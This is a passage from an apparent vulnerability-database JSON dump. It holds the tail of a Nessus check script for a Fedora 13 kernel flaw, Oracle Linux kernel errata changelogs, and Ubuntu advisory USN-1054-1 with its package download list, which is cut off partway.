script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^13([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 13.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC13\", reference:\"kernel-2.6.34.8-68.fc13\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:14", "bulletinFamily": "unix", "cvelist": ["CVE-2010-4165", "CVE-2010-4169", "CVE-2010-4243"], "description": "[2.6.32-71.18.1.el6]\n- [netdrv] ixgbe: make sure FCoE DDP user buffers are really released by the HW (Frantisek Hrbata) [674002 617193]\n- [netdrv] ixgbe: invalidate FCoE DDP context when no error status is available (Frantisek Hrbata) [674002 617193]\n- [netdrv] ixgbe: avoid doing FCoE DDP when adapter is DOWN or RESETTING (Frantisek Hrbata) [674002 617193]\n- [fcoe] libfc: remove tgt_flags from fc_fcp_pkt struct (Mike Christie) [666797 633915]\n- [fcoe] libfc: use rport timeout values for fcp recovery (Frantisek Hrbata) [666797 633915]\n- [fcoe] libfc: incorrect scsi host byte codes returned to scsi-ml (Mike Christie) [666797 633915]\n- [scsi] scsi_dh_alua: fix overflow in alua_rtpg port group id check (Mike Snitzer) [673978 670572]\n[2.6.32-71.17.1.el6]\n- [s390x] kdump: allow zfcpdump to mount and write to ext4 file systems (Amerigo Wang) [661667 628676]\n- [scsi] qla2xxx: Properly set the return value in function qla2xxx_eh_abort (Chad Dupuis) [664398 635710]\n- [scsi] qla2xxx: Drop srb reference before waiting for completion (Chad Dupuis) [664398 635710]\n- [virt] KVM: VMX: Really clear cr0.ts when giving the guest ownership of the fpu (Avi Kivity) [658891 645898]\n- [virt] KVM: SVM: Initialize fpu_active in init_vmcb() (Avi Kivity) [658891 645898]\n- [virt] KVM: x86: Use unlazy_fpu() for host FPU (Avi Kivity) [658891 645898]\n- [virt] KVM: Set cr0.et when the guest writes cr0 (Avi Kivity) [658891 645898]\n- [virt] KVM: VMX: Give the guest ownership of cr0.ts when the fpu is active (Avi Kivity) [658891 645898]\n- [virt] KVM: Lazify fpu activation and deactivation (Avi Kivity) [658891 645898]\n- [virt] KVM: VMX: Allow the guest to own some cr0 bits (Avi Kivity) [658891 645898]\n- [virt] KVM: Replace read accesses of vcpu->arch.cr0 by an accessor (Avi Kivity) [658891 645898]\n- [virt] KVM: VMX: trace clts and lmsw instructions as cr accesses (Avi Kivity) [658891 645898]\n[2.6.32-71.16.1.el6]\n- [net] ipsec: fragment locally generated tunnel-mode IPSec6 packets as needed (Herbert Xu) [670421 661113]\n- [net] tcp: Increase TCP_MAXSEG socket option minimum to TCP_MIN_MSS (Frantisek Hrbata) [652510 652511] {CVE-2010-4165}\n- [perf] perf_events: Fix perf_counter_mmap() hook in mprotect() (Oleg Nesterov) [651672 651673] {CVE-2010-4169}\n- [md] dm mpath: revert 'dm: Call blk_abort_queue on failed paths' (Mike Snitzer) [658854 636771]\n- [x86] UV: Address interrupt/IO port operation conflict (George Beshers) [662921 659480]\n- [mm] guard page for stacks that grow upwards (Johannes Weiner) [666796 630562]\n- [scsi] enable state transistions from OFFLINE to RUNNING (Mike Christie) [660590 643237]\n- [scsi] set queue limits no_cluster for stacked devices (Mike Snitzer) [662050 658293]\n- [mm] Out-of-memory under memory cgroup can call both of oom-killer-for-memcg and oom-killer-for-page-fault (Larry Woodman) [661732 592879]\n- [scsi] libfc: possible race could panic system due to NULL fsp->cmd (Mike Christie) [662049 638297]\n- [kernel] exec: copy-and-paste the fixes into compat_do_execve() paths (Oleg Nesterov) [627811 625695] {CVE-2010-4243}\n- [kernel] exec: make argv/envp memory visible to oom-killer (Oleg Nesterov) [627811 625695] {CVE-2010-4243}\n- [virt] virtio: console: Send SIGIO in case of port unplug (Amit Shah) [652720 624628]\n- [virt] virtio: console: Send SIGIO on new data arrival on ports (Amit Shah) [652720 624628]\n- [virt] virtio: console: Send SIGIO to processes that request it for host events (Amit Shah) [652720 624628]\n- [virt] virtio: console: Reference counting portdev structs is not needed (Amit Shah) [662721 628805]\n- [virt] virtio: console: Add reference counting for port struct (Amit Shah) [662721 628805]\n- [virt] virtio: console: Use cdev_alloc() instead of cdev_init() (Amit Shah) [662721 628805]\n- [virt] virtio: console: Add a find_port_by_devt() function (Amit Shah) [662721 628805]\n- [virt] virtio: console: Add a list of portdevs that are active (Amit Shah) [662721 628805]\n- [virt] virtio: console: open: Use a common path for error handling (Amit Shah) [662721 628805]\n- [virt] virtio: console: remove_port() should return void (Amit Shah) [662721 628805]\n- [virt] virtio: console: Make write() return -ENODEV on hot-unplug (Amit Shah) [662721 628805]\n- [virt] virtio: console: Make read() return -ENODEV on hot-unplug (Amit Shah) [662721 628805]\n- [virt] virtio: console: Unblock poll on port hot-unplug (Amit Shah) [662721 628805]\n- [virt] virtio: console: Un-block reads on chardev close (Amit Shah) [662721 628805]\n- [virt] virtio: console: Check if portdev is valid in send_control_msg() (Amit Shah) [662721 628805]\n- [virt] virtio: console: Remove control vq data only if using multiport support (Amit Shah) [662721 628805]\n- [virt] virtio: console: Reset vdev before removing device (Amit Shah) [662721 628805]\n- [fs] Fix nfsv4 client lock reclaim behaviour (Sachin Prabhu) [661730 638269]\n- [scsi] scsi_dh_alua: Handle all states correctly (Mike Snitzer) [659610 636994]\n- [kernel] execve: improve interactivity and respond to SIGKILL with large arguments (Dave Anderson) [661731 629178]\n- [virt] xen: handle events as edge-triggered (Andrew Jones) [661737 550724]\n- [virt] xen: use percpu interrupts for IPIs and VIRQs (Andrew Jones) [661737 550724]\n[2.6.32-71.15.1.el6]\n- [net] bonding: prevent oopsing on calling pskb_may_pull on shared skb (Andy Gospodarek) [671342 665110]", "edition": 4, "modified": "2011-02-23T00:00:00", "published": "2011-02-23T00:00:00", "id": "ELSA-2011-0283", "href": "http://linux.oracle.com/errata/ELSA-2011-0283.html", "title": "kernel security, bug fix, and enhancement update", "type": "oraclelinux", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:11", "bulletinFamily": "unix", "cvelist": ["CVE-2010-4668", "CVE-2010-4165", "CVE-2010-4169", "CVE-2010-4249"], "description": "[2.6.32-100.28.9.el6]\r\n- sync up the version\r\n \n[2.6.32-100.28.8.el6]\r\n- [block] check for proper length of iov entries earlier in blk_rq_map_user_iov\r\n (Xiaotian Feng) {CVE-2010-4668}\r\n- scm: lower SCM_MAX_FD (Eric Dumazet) {CVE-2010-4249}\r\n- perf_events: Fix perf_counter_mmap() hook in mprotect() (Pekka Enberg)\r\n {CVE-2010-4169}\r\n- tcp: Increase TCP_MAXSEG socket option minimum (David S. Miller)\r\n {CVE-2010-4165}\r\n- Enable module force load option [orabug 11782146]\r\n- Enable vmw balloon and pvscsi (Guru Anbalagane) [orabug 11697522]\r\n \n[2.6.32-100.28.7.el6]\r\n- build from git\r\n \n[2.6.32-100.28.6.el6]\r\n- Remove crashkernel option if it is present [bug 11714928]", "edition": 4, "modified": "2011-03-16T00:00:00", "published": "2011-03-16T00:00:00", "id": "ELSA-2011-2010", "href": "http://linux.oracle.com/errata/ELSA-2011-2010.html", "title": "Oracle Linux 6 Unbreakable Enterprise kernel security fix update", "type": "oraclelinux", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:38", "bulletinFamily": "software", "cvelist": ["CVE-2010-4165", "CVE-2010-0435", "CVE-2010-4169", "CVE-2010-4249"], "description": "===========================================================\r\nUbuntu Security Notice USN-1054-1 February 01, 2011\r\nlinux, linux-ec2 vulnerabilities\r\nCVE-2010-0435, CVE-2010-4165, CVE-2010-4169, CVE-2010-4249\r\n===========================================================\r\n\r\nA security issue affects the following Ubuntu releases:\r\n\r\nUbuntu 10.04 LTS\r\nUbuntu 10.10\r\n\r\nThis advisory also applies to the corresponding versions of\r\nKubuntu, Edubuntu, and Xubuntu.\r\n\r\nThe problem can be corrected by upgrading your system to the\r\nfollowing package versions:\r\n\r\nUbuntu 10.04 LTS:\r\n linux-image-2.6.32-28-386 2.6.32-28.55\r\n linux-image-2.6.32-28-generic 2.6.32-28.55\r\n linux-image-2.6.32-28-generic-pae 2.6.32-28.55\r\n linux-image-2.6.32-28-ia64 2.6.32-28.55\r\n linux-image-2.6.32-28-lpia 2.6.32-28.55\r\n linux-image-2.6.32-28-powerpc 2.6.32-28.55\r\n linux-image-2.6.32-28-powerpc-smp 2.6.32-28.55\r\n linux-image-2.6.32-28-powerpc64-smp 2.6.32-28.55\r\n linux-image-2.6.32-28-preempt 2.6.32-28.55\r\n linux-image-2.6.32-28-server 2.6.32-28.55\r\n linux-image-2.6.32-28-sparc64 2.6.32-28.55\r\n linux-image-2.6.32-28-sparc64-smp 2.6.32-28.55\r\n linux-image-2.6.32-28-versatile 2.6.32-28.55\r\n linux-image-2.6.32-28-virtual 2.6.32-28.55\r\n linux-image-2.6.32-312-ec2 2.6.32-312.24\r\n\r\nUbuntu 10.10:\r\n linux-image-2.6.35-25-generic 2.6.35-25.44\r\n linux-image-2.6.35-25-generic-pae 2.6.35-25.44\r\n linux-image-2.6.35-25-omap 2.6.35-25.44\r\n linux-image-2.6.35-25-powerpc 2.6.35-25.44\r\n linux-image-2.6.35-25-powerpc-smp 2.6.35-25.44\r\n linux-image-2.6.35-25-powerpc64-smp 2.6.35-25.44\r\n linux-image-2.6.35-25-server 2.6.35-25.44\r\n linux-image-2.6.35-25-versatile 2.6.35-25.44\r\n linux-image-2.6.35-25-virtual 2.6.35-25.44\r\n\r\nAfter a standard system update you need to reboot your computer to make\r\nall the necessary changes.\r\n\r\nATTENTION: Due to an unavoidable ABI change the kernel updates have\r\nbeen given a new version number, which requires you to recompile and\r\nreinstall all third party kernel modules you might have installed. If\r\nyou use linux-restricted-modules, you have to update that package as\r\nwell to get modules which work with the new kernel version. Unless you\r\nmanually uninstalled the standard kernel metapackages (e.g. linux-generic,\r\nlinux-server, linux-powerpc), a standard system upgrade will automatically\r\nperform this as well.\r\n\r\nDetails follow:\r\n\r\nGleb Napatov discovered that KVM did not correctly check certain\r\nprivileged operations. A local attacker with access to a guest kernel\r\ncould exploit this to crash the host system, leading to a denial of\r\nservice. (CVE-2010-0435)\r\n\r\nSteve Chen discovered that setsockopt did not correctly check MSS values.\r\nA local attacker could make a specially crafted socket call to crash\r\nthe system, leading to a denial of service. (CVE-2010-4165)\r\n\r\nDave Jones discovered that the mprotect system call did not correctly\r\nhandle merged VMAs. A local attacker could exploit this to crash the\r\nsystem, leading to a denial of service. (CVE-2010-4169)\r\n\r\nVegard Nossum discovered that memory garbage collection was not\r\nhandled correctly for active sockets. A local attacker could exploit\r\nthis to allocate all available kernel memory, leading to a denial of\r\nservice. (CVE-2010-4249)\r\n\r\n\r\nUpdated packages for Ubuntu 10.04 LTS:\r\n\r\n Source archives:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.32-312.24.diff.gz\r\n Size/MD5: 8987000 0a15b6ffeb6b82dac8f0d2183b54e89c\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.32-312.24.dsc\r\n Size/MD5: 2104 ca9acfb9f4de054200495ef9d1b3ef49\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.32.orig.tar.gz\r\n Size/MD5: 81900940 4b1f6f6fac43a23e783079db589fc7e2\r\n http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.32-28.55.diff.gz\r\n Size/MD5: 5092730 21cd0005957f842db1436b15abe9f3c9\r\n http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.32-28.55.dsc\r\n Size/MD5: 6170 aaac9600e6505f190e5ed84878944f39\r\n http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.32.orig.tar.gz\r\n Size/MD5: 81900940 4b1f6f6fac43a23e783079db589fc7e2\r\n\r\n Architecture independent packages:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-doc_2.6.32-312.24_all.deb\r\n Size/MD5: 6428564 70d78e605dadc4550049757f3614cf68\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-source-2.6.32_2.6.32-312.24_all.deb\r\n Size/MD5: 68173994 daa81e56618a4614ec21e7b63f04f8df\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.32-312_2.6.32-312.24_all.deb\r\n Size/MD5: 10041174 10f1977974ad2f16af47a1217a30d6ed\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc_2.6.32-28.55_all.deb\r\n Size/MD5: 6427956 d982d2c5ce63ccded71920ae7513cc46\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-28_2.6.32-28.55_all.deb\r\n Size/MD5: 9906550 3b56c8b331171d4b83ab8b656c484def\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.32_2.6.32-28.55_all.deb\r\n Size/MD5: 65913962 6ee2688fda012f8b5e6973323557d293\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-tools-common_2.6.32-28.55_all.deb\r\n Size/MD5: 95494 44349b757e03fbe7c05d07f4640d96ad\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.32-312-ec2_2.6.32-312.24_amd64.deb\r\n Size/MD5: 679760 b4b316d698383105533a1e461f179ba0\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.32-312-ec2_2.6.32-312.24_amd64.deb\r\n Size/MD5: 19885308 f3d13d705228acb376517e33460a45ee\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.32-28-generic-di_2.6.32-28.55_amd64.udeb\r\n Size/MD5: 245258 c083dd83bddd7b32cead685e55e30c40\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.32-28-generic-di_2.6.32-28.55_amd64.udeb\r\n Size/MD5: 16458 a1ce222b8d7daa8d2cbfd17b54d93893\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.32-28-generic-di_2.6.32-28.55_amd64.udeb\r\n Size/MD5: 50472 f7b0a06026066d79e8deec7f3f96f7b6\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.32-28-generic-di_2.6.32-28.55_amd64.udeb\r\n Size/MD5: 46202 a2cf9d3b9c4c54198947f02973528cfb\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.32-28-generic-di_2.6.32-28.55_amd64.udeb\r\n Size/MD5: 52040 6435d1cdb82e2c6a7b6b83f50e924ceb\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.32-28-generic-di_2.6.32-28.55_amd64.udeb\r\n Size/MD5: 94730 a3470bfa69fc0d70e71929c59b5167ca\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.32-28-generic-di_2.6.32-28.55_amd64.udeb\r\n Size/MD5: 38660 22199c692bf834dfe380c590f5cd9ebb\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.32-28-generic-di_2.6.32-28.55_amd64.udeb\r\n Size/MD5: 540068 5e81f8f5cff4a66c2bda997acbc34bee\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.32-28-generic-di_2.6.32-28.55_amd64.udeb\r\n Size/MD5: 133654 b04f521c9e777d3f841c4be0638e10ff\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.32-28-generic-di_2.6.32-28.55_amd64.udeb\r\n Size/MD5: 100832 d7255cc68e246cfd7bfbac5b1b3c9eb8\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.32-28-generic-di_2.6.32-28.55_amd64.udeb\r\n Size/MD5: 324100 dc8327d54937770913b719cc5f7898e1\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.32-28-generic-di_2.6.32-28.55_amd64.udeb\r\n Size/MD5: 4465316 2df537d769387fb9a81e8afa874ef75b\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-28-generic_2.6.32-28.55_amd64.deb\r\n Size/MD5: 793008 e804e2beda47bf14b253ce2944a279e9\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-28-preempt_2.6.32-28.55_amd64.deb\r\n Size/MD5: 793264 c6d3defbab41cdb2181c2cbf45ba29ef\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-28-server_2.6.32-28.55_amd64.deb\r\n Size/MD5: 794480 f1dd0ae306f67232cce4d47939b21446\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-28-generic_2.6.32-28.55_amd64.deb\r\n Size/MD5: 31695638 d627f41ffb23a536b510afa0550e0387\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-28-preempt_2.6.32-28.55_amd64.deb\r\n Size/MD5: 31931030 22f8a7860dccb3c7ece51f0e5a1399a3\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-28-server_2.6.32-28.55_amd64.deb\r\n Size/MD5: 31734548 706ea2e435894f0493109f2055727c13\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-28-virtual_2.6.32-28.55_amd64.deb\r\n Size/MD5: 12527482 22758db62368bf9472d5d90db6663959\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.32-28.55_amd64.deb\r\n Size/MD5: 824952 3e9ca9c36b6c30d58c3b8d7154e4f3fa\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-tools-2.6.32-28_2.6.32-28.55_amd64.deb\r\n Size/MD5: 223304 0a470b1a742bd0c520cfe0b1848c3d99\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.32-28-generic-di_2.6.32-28.55_amd64.udeb\r\n Size/MD5: 177468 6e4ad0743df66dcf10341e0761ca0f5c\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.32-28-generic-di_2.6.32-28.55_amd64.udeb\r\n Size/MD5: 266802 2d26713ac7de30d426c2908600e30ce0\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.32-28-generic-di_2.6.32-28.55_amd64.udeb\r\n Size/MD5: 32452 f247dff43b2112bbdd5f29b303a9ce47\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.32-28-generic-di_2.6.32-28.55_amd64.udeb\r\n Size/MD5: 331554 0cb913c385dbd7c9f7e2d6d56fbb3cea\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.32-28-generic-di_2.6.32-28.55_amd64.udeb\r\n Size/MD5: 2426230 d4052d2f5992bc976fafa3b42f38e629\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.32-28-generic-di_2.6.32-28.55_amd64.udeb\r\n Size/MD5: 163666 6254f15ed7627aced11faf56d05f3391\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.32-28-generic-di_2.6.32-28.55_amd64.udeb\r\n Size/MD5: 246072 63afda04d6f0609cc4146cc0567fdeae\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.32-28-generic-di_2.6.32-28.55_amd64.udeb\r\n Size/MD5: 180524 e431eecca625608d3112d8cff011c7f8\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.32-28-generic-di_2.6.32-28.55_amd64.udeb\r\n Size/MD5: 39260 d8f6a0fae18293acb5f62dc137186d30\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.32-28-generic-di_2.6.32-28.55_amd64.udeb\r\n Size/MD5: 152456 f9b89b24af9aed006d6e3828e5c309a6\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.32-28-generic-di_2.6.32-28.55_amd64.udeb\r\n Size/MD5: 77346 31ce85a50b5050bea61e305836dece36\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.32-28-generic-di_2.6.32-28.55_amd64.udeb\r\n Size/MD5: 22998 c94b6e6de6edf21c82740d80eef2f375\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.32-28-generic-di_2.6.32-28.55_amd64.udeb\r\n Size/MD5: 9742 b9752514f105a5f7c1b9eb43acb3d39e\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.32-28-generic-di_2.6.32-28.55_amd64.udeb\r\n Size/MD5: 40876 1727693357d159f89404a22f5c158fbb\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.32-28-generic-di_2.6.32-28.55_amd64.udeb\r\n Size/MD5: 104254 55cbd73ff31fd0e02ef847224274dac2\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.32-28-generic-di_2.6.32-28.55_amd64.udeb\r\n Size/MD5: 1476204 8d6652b714065978f5d20bed3dfac8a8\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.32-28-generic-di_2.6.32-28.55_amd64.udeb\r\n Size/MD5: 40994 5994806be048cda7b8aad7d792c1b970\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/squashfs-modules-2.6.32-28-generic-di_2.6.32-28.55_amd64.udeb\r\n Size/MD5: 15420 d3d8b006c20a1c4290aa379b9e2e5e63\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.32-28-generic-di_2.6.32-28.55_amd64.udeb\r\n Size/MD5: 53130 84d8e16b51ab348d760d54a5d87f187d\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.32-28-generic-di_2.6.32-28.55_amd64.udeb\r\n Size/MD5: 134520 921c3a9b6001ecaa47ca8cd90a01be5f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.32-28-generic-di_2.6.32-28.55_amd64.udeb\r\n Size/MD5: 16734 d03d746bd167dd5e3d8e813bc33c566b\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/vlan-modules-2.6.32-28-generic-di_2.6.32-28.55_amd64.udeb\r\n Size/MD5: 22378 6c19fd323e09df5529b89346bb6818a6\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.32-312-ec2_2.6.32-312.24_i386.deb\r\n Size/MD5: 655420 6f114ad32812e1dde95f188a3d153415\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.32-312-ec2_2.6.32-312.24_i386.deb\r\n Size/MD5: 19224436 25485d5f3bf1f87bbbdbda35f8bb9e36\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.32-28-generic-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 207174 3103b7a465f8c50d94703e3431a07180\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.32-28-generic-pae-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 212536 d48370a99bec30a5aead214221ef3c56\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.32-28-generic-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 34258 77e35784ade960740baaa336af1cf830\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.32-28-generic-pae-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 34566 8c6b25529baaf6e8e1fb2d586dbdc5cb\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.32-28-generic-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 48016 1eb5029ec3b567882cf52890a8fc2d5b\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.32-28-generic-pae-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 48040 0a8ab3b760654e07a5a8d17de0647f02\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.32-28-generic-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 43650 6fb7771de1c004cc47b89390374bba3c\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.32-28-generic-pae-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 43656 fc2b8fb4e6e9b7709e37a5fb91821022\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.32-28-generic-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 47832 756628bee5dfdc44672626f035128704\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.32-28-generic-pae-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 47882 331ee5afc0f980390ea9be739d8b009e\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.32-28-generic-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 90450 f76996473d3e8deb77b94a8738cfe396\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.32-28-generic-pae-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 90742 b8435994a1edabe689ad536ed65e66b9\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.32-28-generic-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 34642 83a448394d1c7a8a075a7d92d75bc2d9\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.32-28-generic-pae-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 34694 89108134cff8ec1c21646a8cb3ea4731\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.32-28-generic-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 535824 5c8c5a7973b10e4d89d6f76a56d8f22f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.32-28-generic-pae-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 535684 362d6466a13f88b7ea06d7cc288407bf\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.32-28-generic-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 130860 bba69d3fd672406b07c51fcb36eec98f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.32-28-generic-pae-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 130864 64132cdd8b0cccf0747c085e462f0c81\r\n 